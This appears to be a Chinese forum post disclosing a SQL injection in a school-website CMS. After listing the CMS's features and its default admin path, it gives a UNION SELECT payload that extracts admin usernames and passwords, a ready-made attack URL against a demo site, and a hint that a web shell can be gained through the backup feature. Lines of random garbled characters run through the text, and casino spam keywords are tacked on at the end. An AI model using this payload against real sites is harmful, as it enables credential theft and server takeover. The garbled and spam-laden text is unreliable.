$ @, o" e. H$ |3 G' g" I2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
; j3 r1 e  M; e4 `) T( L7 T4.视频图片管理:一级分类,动态添加视频或者图片等信息
" i" n0 H+ E, R( Z3 \( T5.留言管理:对留言,修改,删除、回复等管理
: S' ~- N) f; i2 A% K; V6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
默认后台:admin/login.asp
. t5 r3 _! a# o, J2 O4 D1 c5 d官方演示:http://demo.001cms.net
源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ k* ?5 H3 B1 ?, A- K0 z测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
7 y: D: ^( O1 a2 rgetshell:后台有备份，你懂的
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines